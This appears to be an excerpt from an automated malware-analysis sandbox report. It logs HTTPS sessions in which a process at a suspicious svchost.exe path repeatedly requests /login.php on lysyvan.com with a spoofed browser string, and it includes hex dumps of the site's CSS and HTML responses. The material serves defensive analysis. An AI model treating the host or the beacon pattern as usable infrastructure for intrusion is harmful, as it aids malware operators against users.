                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 73 69 74 65 2d 64 65 73 63 72 69 70 74 69 6f 6e 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 39 33 37 35 72 65 6d 3b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 7d 2e 65 6e 74 72 79 2d 74 69 74 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 7d 68 31 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 34 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f
                                                                                                                                                                                                                  Data Ascii: site-description{font-size:15px;font-size:0.9375rem;display:none;}.entry-title{font-size:26px;font-size:1.625rem;}h1,.entry-content h1{font-size:40px;font-size:2.5rem;font-weight:600;line-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;fo
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 5d 3a 3a 2d 77 65 62 6b 69 74 2d 73 6c 69 64 65 72 2d 74 68 75 6d 62 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 7d 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 68 6f 76 65 72 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 2c 2e 73 69 74 65 2d 66 6f 6f 74 65 72 20 61 3a 66 6f 63 75 73 20 2b 20 2e 70 6f 73 74 2d 63 6f 75 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 64 31 30 34 30 34 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d
                                                                                                                                                                                                                  Data Ascii: ]::-webkit-slider-thumb{border-color:#d10404;background-color:#d10404;box-shadow:none;}.site-footer a:hover + .post-count,.site-footer a:focus + .post-count{background:#d10404;border-color:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 69 66 62 2d 63 74 61 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 75 61 67 62 2d 62 75 74 74 6f 6e 73 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 62 62 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 65 6e 74 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 70 6f 73 74 2d 67 72 69 64 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74
                                                                                                                                                                                                                  Data Ascii: ontent .uagb-ifb-cta a,.ast-single-post .entry-content .wp-block-uagb-buttons a,.ast-single-post .entry-content .uabb-module-content a,.ast-single-post .entry-content .uagb-post-grid a,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .ent
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 73 69 62 6c 65 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6a 73 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 6d 69 6e 69 2d 63 61 72 74 2d 69 74 65 6d 20 61 2e 72 65 6d 6f 76 65 3a 66 6f 63 75 73 2d 76 69 73 69 62 6c 65 7b 6f 75 74 6c 69 6e 65 2d 73 74 79 6c 65 3a 64 6f 74 74 65 64 3b 6f 75 74 6c 69 6e 65 2d 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 6f 75 74 6c 69 6e 65 2d 77 69 64 74 68 3a 74 68 69 6e 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 7d 69 6e 70 75 74 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74
                                                                                                                                                                                                                  Data Ascii: sible,.woocommerce-js .woocommerce-mini-cart-item a.remove:focus-visible{outline-style:dotted;outline-color:inherit;outline-width:thin;border-color:transparent;}input:focus,input[type="text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[t
                                                                                                                                                                                                                  2024-11-11 17:50:51 UTC1369INData Raw: 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 45 64 69 74 41 63 63 6f 75 6e 74 46 6f 72 6d 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 66 6f 72 6d 2d 72 6f 77 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 49 6e 70 75 74 2e 69 6e 70 75 74 2d 74 65 78 74 3a 66 6f 63 75 73 2c 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 2e 61 73 74 2d 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 63 6f 6e 74 61 69 6e 65 72 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 70 61 67 69 6e 61 74 69 6f 6e 20 75 6c 2e 70 61 67 65 2d 6e 75 6d 62 65 72 73 20 6c 69 20 61 3a 66 6f 63 75 73 2c 62 6f 64 79 20 23 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 73 65 6c 65 63 74 32 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 64 65 66 61 75 6c 74 20 2e 73
                                                                                                                                                                                                                  Data Ascii: tent .woocommerce-EditAccountForm .woocommerce-form-row .woocommerce-Input.input-text:focus,.woocommerce .ast-woocommerce-container .woocommerce-pagination ul.page-numbers li a:focus,body #content .woocommerce form .form-row .select2-container--default .s


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  7192.168.2.654680188.114.97.34431112C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:53 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1089INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:54 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="90.8",amp_style_sanitizer;dur="32.6",amp_tag_and_attribute_sanitizer;dur="39.0",amp_optimizer;dur="47.5"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i8ultcjbx3qKLlX7JzQcZTiaAgUQn5JYgMW%2BlgO7FvjBtam1P5Gk%2BIlqhzhKPDxHZt%2BRbr0fATGL8vwxCpQpVq0zfeHcoYyL%2FzU6JxaeaMc8RVBHr8BeIQXdnu3iSA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10208e7937ac0f-YYZ
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=11900&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=242993&cwnd=38&unsent_bytes=0&cid=0d3acfbefe145dc7&ts=1588&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC280INData Raw: 37 63 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                                  Data Ascii: 7c1c<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 61 6d 70 70 72 6f 6a 65 63 74 2e 6f 72 67 22 3e 3c 73 74 79 6c 65 20 61 6d 70 2d 72 75 6e 74 69 6d 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 76 65 72 73 69 6f 6e 3d 22 30 31 32 34 31 30 31 36 31 38 30 31 30 30 30 22 3e 68 74 6d 6c 7b 6f 76 65 72 66 6c 6f 77 2d 78 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 7b 68 65 69 67 68 74 3a 31 30
                                                                                                                                                                                                                  Data Ascii: set="UTF-8"><meta name="viewport" content="width=device-width,minimum-scale=1"><link rel="preconnect" href="https://cdn.ampproject.org"><style amp-runtime="" i-amphtml-version="012410161801000">html{overflow-x:hidden!important}html.i-amphtml-fie{height:10
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 69 6e 67 3a 74 6f 75 63 68 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 3e 62 6f 64 79 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 21 69 6d 70 6f 72 74 61 6e 74 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 76 69 73 69 62 6c 65 7d 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 2d 65 6c 65 6d 65 6e 74 2c 23 69 2d 61 6d 70 68 74 6d 6c 2d 77 72 61 70 70 65 72 2b 62 6f 64 79 5b 69 2d 61 6d 70 68 74 6d 6c 2d 6c 69 67 68 74 62 6f 78 5d 7b 76
                                                                                                                                                                                                                  Data Ascii: ing:touch!important}#i-amphtml-wrapper>body{position:relative!important;border-top:1px solid transparent!important}#i-amphtml-wrapper+body{visibility:visible}#i-amphtml-wrapper+body .i-amphtml-lightbox-element,#i-amphtml-wrapper+body[i-amphtml-lightbox]{v
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 5b 73 74 61 6e 64 61 6c 6f 6e 65 5d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 37 35 37 35 37 35 7d 61 6d 70 2d 73 74 6f 72 79 20 2e 61 6d 70 2d 61 63 74 69 76 65 3e 64 69 76 2c 61 6d 70 2d 73 74 6f 72 79 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 6f 61 64 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 61 6d 70 2d 73 74 6f 72 79 2d 70 61 67 65 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79
                                                                                                                                                                                                                  Data Ascii: 00%!important}amp-story[standalone]{background-color:#000!important;position:relative!important}amp-story-page{background-color:#757575}amp-story .amp-active>div,amp-story .i-amphtml-loader-background{display:none!important}amp-story-page:not(:first-of-ty
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 69 6d 67 29 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 72 65 73 70 6f 6e 73 69 76 65 29 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 2c 5b 6c 61 79 6f 75 74 3d 69 6e 74 72 69 6e 73 69 63 5d 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 69 6e 74 72 69 6e 73 69 63 29 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69
                                                                                                                                                                                                                  Data Ascii: tml-layout-responsive),[width][height][sizes]:not(img):not([layout]):not(.i-amphtml-layout-responsive){display:block;position:relative}.i-amphtml-layout-intrinsic,[layout=intrinsic][width][height]:not(.i-amphtml-layout-intrinsic){display:inline-block;posi
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 62 6c 75 72 72 79 2d 70 6c 61 63 65 68 6f 6c 64 65 72 2c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 30 3b 6d 61 78 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 6d 69 6e 2d 77 69 64 74 68 3a 31 30 30 25 3b 77 69 64 74 68 3a 30 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 73 69 7a 65 2d 64 65 66 69 6e 65 64 20 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 6c 6c 2d 63 6f 6e 74 65 6e 74 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30
                                                                                                                                                                                                                  Data Ascii: y:none!important}}.i-amphtml-blurry-placeholder,.i-amphtml-fill-content{display:block;height:0;max-height:100%;max-width:100%;min-height:100%;min-width:100%;width:0;margin:auto}.i-amphtml-layout-size-defined .i-amphtml-fill-content{position:absolute;top:0
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 2d 63 6f 6e 74 61 69 6e 65 72 29 3e 2a 2c 5b 6c 61 79 6f 75 74 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 3d 63 6f 6e 74 61 69 6e 65 72 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 68 65 69 67 68 74 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 2c 5b 77 69 64 74 68 5d 5b 68 65 69 67 68 74 5d 5b 73 69 7a 65 73 5d 3a 6e 6f 74 28 5b 6c 61 79 6f 75 74 5d 29 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 2a 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 69 6d 67 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74
                                                                                                                                                                                                                  Data Ascii: not(.i-amphtml-layout-container)>*,[layout]:not([layout=container]):not(.i-amphtml-element)>*,[width][height][heights]:not([layout]):not(.i-amphtml-element)>*,[width][height][sizes]:not([layout]):not(.i-amphtml-element)>*{display:none}amp-img:not(.i-ampht
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 6d 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 7a 2d 69 6e 64 65 78 3a 31 7d 61 6d 70 2d 69 6d 67 5b 69 2d 61 6d 70 68 74 6d 6c 2d 73 73 72 5d 3a 6e 6f 74 28 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 29 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 7a 2d 69 6e 64 65 78 3a 61 75 74 6f 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 74 62 75 69 6c 74 3e 5b 70 6c 61 63 65 68 6f 6c 64 65 72 5d 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 68 69 64 64 65 6e 2d 62 79 2d 6d 65 64 69 61 2d 71 75 65 72 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 69 2d 61 6d 70 68 74 6d 6c 2d 65 6c 65 6d 65 6e 74 2d 65 72 72 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 72 65 64 21 69 6d 70
                                                                                                                                                                                                                  Data Ascii: m:0!important;z-index:1}amp-img[i-amphtml-ssr]:not(.i-amphtml-element)>[placeholder]{z-index:auto}.i-amphtml-notbuilt>[placeholder]{display:block!important}.i-amphtml-hidden-by-media-query{display:none!important}.i-amphtml-element-error{background:red!imp
                                                                                                                                                                                                                  2024-11-11 17:50:54 UTC1369INData Raw: 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 61 6d 70 2d 73 74 6f 72 79 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 21 69 6d 70 6f 72 74 61 6e 74 7d 68 74 6d 6c 2e 69 2d 61 6d 70 68 74 6d 6c 2d 66 69 65 3e 61 6d 70 2d 61 6e 61 6c 79 74 69 63 73 7b 70 6f 73 69 74 69 6f 6e 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 5b 76 69 73 69 62 6c 65 2d 77 68 65 6e 2d 69 6e 76 61 6c 69 64 5d 3a 6e 6f 74 28 2e 76 69 73 69 62 6c 65 29 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 65 72 72 6f 72 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 2d 73 75 63 63 65 73 73 5d 2c 66 6f 72 6d 20 5b 73 75 62 6d 69 74 74 69 6e 67 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 61 6d 70 2d 61 63 63 6f 72 64 69 6f 6e
                                                                                                                                                                                                                  Data Ascii: idden!important;visibility:hidden}amp-story{visibility:hidden!important}html.i-amphtml-fie>amp-analytics{position:initial!important}[visible-when-invalid]:not(.visible),form [submit-error],form [submit-success],form [submitting]{display:none}amp-accordion


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  8192.168.2.654701188.114.97.3443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-11-11 17:50:55 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                                  Referer: http://www.google.com
                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                                  Host: lysyvan.com
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC1103INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                  Date: Mon, 11 Nov 2024 17:50:58 GMT
                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                  vary: Accept-Encoding
                                                                                                                                                                                                                  expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                  link: <https://lysyvan.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                  server-timing: amp_sanitizer;dur="109.1",amp_style_sanitizer;dur="45.7",amp_tag_and_attribute_sanitizer;dur="32.8",amp_optimizer;dur="56.7"
                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3H2%2FQjfCttD5TNIeL0%2Bepi4c4dg%2BVPfIBejVpsSiDzkqwtjQfEUEPO%2BRz%2F07iF7taOeeQ%2FIwk9ed3Qi53DT1HiVaxHoLlcZ%2F8WmvUTOWf%2F6MDci8ij%2FhFftfQx4%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                  CF-RAY: 8e10209e4e4e0c7a-EWR
                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1167&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=881&delivery_rate=2177443&cwnd=251&unsent_bytes=0&cid=824806930f275890&ts=2431&x=0"
                                                                                                                                                                                                                  2024-11-11 17:50:58 UTC266INData Raw: 37 63 30 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 64 61 74 61 2d 61 6d 70 2d 62 69 6e 64 2d 63 6c 61 73 73 3d 22 69 73 44 61 72 6b 20 3f 20 27 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 27 20 3a 20 27 6e 65 76 65 2d 6c 69 67 68 74 2d 74 68 65 6d 65 27 22 20 63 6c 61 73 73 3d 22 6e 65 76 65 2d 64 61 72 6b 2d 74 68 65 6d 65 22 20 61 6d 70 3d 22 22 20 64 61 74 61 2d 61 6d 70 2d 61 75 74 6f 2d 6c 69 67 68 74 62 6f 78 2d 64 69 73 61 62 6c 65 20 74 72 61 6e 73 66 6f 72 6d 65 64 3d 22 73 65 6c 66 3b 76 3d 31 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6c 61 79 6f 75 74 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 6e 6f 2d 62 6f 69 6c 65 72 70 6c 61 74 65 3d 22 22 20 69 2d 61 6d 70 68 74 6d 6c 2d 62
                                                                                                                                                                                                                  Data Ascii: 7c0f<!DOCTYPE html><html lang="en-US" data-amp-bind-class="isDark ? 'neve-dark-theme' : 'neve-light-theme'" class="neve-dark-theme" amp="" data-amp-auto-lightbox-disable transformed="self;v=1" i-amphtml-layout="" i-amphtml-no-boilerplate="" i-amphtml-b
